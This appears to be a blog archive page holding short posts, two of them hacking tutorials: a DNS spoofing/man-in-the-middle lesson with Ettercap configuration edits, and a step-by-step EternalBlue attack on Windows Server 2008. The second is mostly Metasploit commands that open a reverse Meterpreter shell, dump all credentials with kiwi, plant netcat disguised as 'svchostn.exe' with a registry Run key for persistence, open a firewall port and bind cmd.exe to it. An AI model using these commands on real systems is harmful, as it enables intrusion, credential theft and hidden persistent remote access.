September 2019
best sinhala blog in sri lanka
Hi all this is the gcam mod Pixel 4 Google Camera 7.0








best sinhala blog in sri lanka
Hi All today i am going to show how to do a DNS Spoof Attack


So first of all i am going to show how the network map is





Before start i am going to describe what is What is man in the middle attack.

What is man in the middle attack

A man in the middle (MITM) attack is a general term for when a attacker positions himself in a conversation between a user and an application


Why man in the middle attack ?

To Steal personal information ( login credentials, account details and credit card numbers)


Common Targets

Financial applications
SaaS businesses
e-commerce sites and other websites where logging in is required.


Results


  • Identity Theft
  • Unapproved fund transfers
  • Password change
  • Gain a access to a secured perimeter


Types of MITMA


  • IP spoofing
  • DNS spoofing
  • HTTPS spoofing
  • SSL hijacking
  • Email hijacking
  • Wi-Fi eavesdropping
  • Stealing browser cookies




So now we can Start our Lesson

On Hacker Machine

Kali Linux Latest


On Target Machine Windows 10 Latest



Load config file

/etc/ettecap/etter.conf



edit config file with following

change the “ec_uid” and “ec_gid” values to 0

after that find and uncomment these two lines:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"




Save changes


Then Load Ettercap by searching from the application list or execute sudo -E ettercap -G this in terminal





Now you can watch this Video to get a clear idea










best sinhala blog in sri lanka
Hi All Today im going to show how to hack Windows Server 2008 with Fresh installation



All you can find thing by looking at following Video




These are the commands 


Find and load Exploit


Get a terminal

#metasploit

msf5 > search eternalblue

msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.43.42 [Your target ip]


msf5 exploit(windows/smb/ms17_010_eternalblue) > show payloads

msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp

msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.43.244 [Your ip]
msf5 exploit(windows/smb/ms17_010_eternalblue) > run

After exploit we can execute this 


To Load cmd.exe 
meterpreter > shell

C:\Windows\system32>whoami
C:\Windows\system32>exit


To get all Usernames and Passwords

meterpreter > 
meterpreter > load kiwi
meterpreter > creds_all



Upload netcat to server and rename it a look like system executable


meterpreter > upload /usr/share/windows-binaries/nc.exe svchostn.exe

meterpreter > reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v svchostn -d 'C:\Windows\system32\svchostn.exe -Ldp 7777 -e cmd.exe'

meterpreter > reg queryval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v svchostn


View Firewall Rules and apply new rules


meterpreter > shell

C:\Windows\system32>netsh  firewall show opmode

C:\Windows\system32>  
netsh advfirewall firewall add rule name="Service Window" dir=in action=allow protocol=TCP localport=7777

C:\Windows\system32>exit

meterpreter > execute -f svchostn.exe -Ldp 7777 -e cmd.exe



On New window



nc 192.168.43.42 7777